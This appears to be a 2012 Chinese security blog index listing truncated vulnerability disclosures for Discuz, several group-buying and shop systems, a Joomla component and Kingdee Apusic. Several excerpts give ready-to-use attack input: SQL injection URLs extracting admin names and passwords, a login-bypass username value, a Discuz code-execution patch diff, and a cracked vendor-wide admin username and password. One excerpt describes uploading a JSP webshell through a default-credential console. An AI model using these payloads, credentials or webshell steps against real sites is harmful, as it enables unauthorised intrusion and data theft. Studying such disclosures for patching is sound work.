Discuz NT 多版本文件上传漏洞 漏洞公布

post by admin 2012-5-17 11:04 Thursday
文章作者:rebeyond 

信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 

注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。 

受影响版本:貌似都受影响。 

漏洞文件:tools/ajax.aspx 

阅读全文>>

标签: Discuz

评论(0) 引用(0) 浏览(18)

Discuz! X2.5 远程代码执行漏洞及EXP

post by admin 2012-5-3 8:37 Thursday
过程简单说下,记的有点乱不贴太多代码了



 if(!defined(''IN_DISCUZ'')) {
@@ -89,7 +89,7 @@
}
}
if($searcharray && $replacearray) {
- $content = preg_replace("/(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|

(\[attach\](\d+)\[\/attach\])/ies", ''helper_seo::base64_transform

("encode", "<relatedlink>", "\\1\\2\\3", "</relatedlink>")'', $content);
+ $content = preg_replace("/(<a\s+.*?>.*?<\/a>)|(<img\s+.*?[\/]?>)|

阅读全文>>

标签: Discuz!X2.5 EXP

评论(0) 引用(0) 浏览(27)

多多淘宝客程序V7.4 SQL注射绕过漏洞 漏洞公布

post by admin 2012-5-3 8:36 Thursday
问题位置:huangou.php ID过滤不严格
$id =$_GET[''id''];
$good=sel_sql(‘dhlist’,''id,name,pic,money,jifen,num,content,num’,''id=’.$id);

详细说明:
7.4 3月20号之前的代码,注入确实没修,huangou.php
$id =$_GET[''id''];
$good=sel_sql(‘dhlist’,''id,name,pic,money,jifen,num,content,num’,''id=’.$id);

阅读全文>>

标签: SQL注射 多多淘宝客程序

评论(0) 引用(0) 浏览(27)

ESHOP(网商宝商城)1.0 GetWebshell 漏洞 漏洞公布

post by admin 2012-5-3 8:34 Thursday
在前台搜索处,价格从  到  哪里一处数字型注入点

http://xxxx.com/p_list.aspx?keyword=%&amp;maxPrice=0&amp;minPrice=0 and (select top 1 admin from admin)>0

// 第一个管理员的登录名

http://xxxx.com/p_list.aspx?keyword=%&amp;maxPrice=0&amp;minPrice=0 and (select top 1 password from admin)>0

阅读全文>>

标签: ESHOP

评论(0) 引用(0) 浏览(27)

天天团购网盲注漏洞 漏洞公布

post by admin 2012-2-14 8:18 Tuesday

漏洞作者: kobin97

提交时间: 2012-01-20
公开时间: 2012-01-25

漏洞类型: SQL注射漏洞

详细说明:

当没有整合uc时,造成可以利用的盲注点

 

  1. function CheckEmail(){ 
    2.

阅读全文>>

标签: 天天团购

评论(0) 引用(0) 浏览(163)

最土团购程序后台登陆SQL注入 漏洞公布

post by admin 2012-2-14 8:14 Tuesday

漏洞作者: kobin97

提交时间: 2012-01-20
公开时间: 2012-01-25

漏洞类型: SQL注射漏洞
详细说明:

http://demo.zuitu.com/manage/login.php
username 字段改为:
username[=0x7c or manager=1#]

用户名密码随便输,便直接进入后台。

 

阅读全文>>

标签: 最土团购 SQL注入

评论(0) 引用(0) 浏览(173)

讯奇旅游网站系统注入漏洞 漏洞公布

post by admin 2012-2-14 8:00 Tuesday
整个系统都是注入!

如:Jingdian_Show.asp

    News_Show.asp

这些文件都包含 UU.Lable.All.asp
代码:

阅读全文>>

标签: 讯奇旅游网站

评论(0) 引用(0) 浏览(99)

Joomla讨论组件com_discussions SQL注射及修复 漏洞公布

post by admin 2012-1-19 15:05 Thursday
标题: Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
作者: Red Security TEAM bbs.3344.eu
下载地址: http://extensions.joomla.org/extensions/communication/forum/13560
测试平台: CentOS
测试示例:
# http://www.0517net.com/index.php?option=com_discussions&view=thread&catid=[SQLi]
#

阅读全文>>

标签: Joomla

评论(0) 引用(0) 浏览(545)

万企互联网站程序通杀oday及修复方案 漏洞公布

post by admin 2012-1-18 8:55 Wednesday
一、漏洞分析
漏洞存在页面:newsdisp.asp
很明显的注入漏洞!
有些站做了防注!(cookie注入就可以搞定了)
一般的表名为admin 字段名为:username password
有些站表为wq_admin 字段同上
还有个更要命的漏洞(不过也不是什么漏洞)!
这些站基本都用了网络公司给他们的用户名跟密码!
用户名:xywanqi
密码:wanqi#029*(这个密码还得谢谢壞壞不乖兄弟破解)

阅读全文>>

标签: 万企互联网站程序

评论(0) 引用(0) 浏览(149)

金蝶Apusic Web框架后台拿网站webshell及修复 漏洞公布

post by admin 2012-1-18 8:54 Wednesday
Apusic Web管理控制台
默认后台地址:admin/login.jsp
默认管理账号密码:admin admin
 
利用方法:后台有执行SQL语句的地,也有加载神马的。具体字样忘记了~
找到上传的地,一个加载神马的,只要看到“浏览”二字,你就懂了。建立一个完了命名t00ls,然后将一个war后缀的JSP马上传。

阅读全文>>

标签: 金蝶Apusic Web

评论(0) 引用(0) 浏览(161)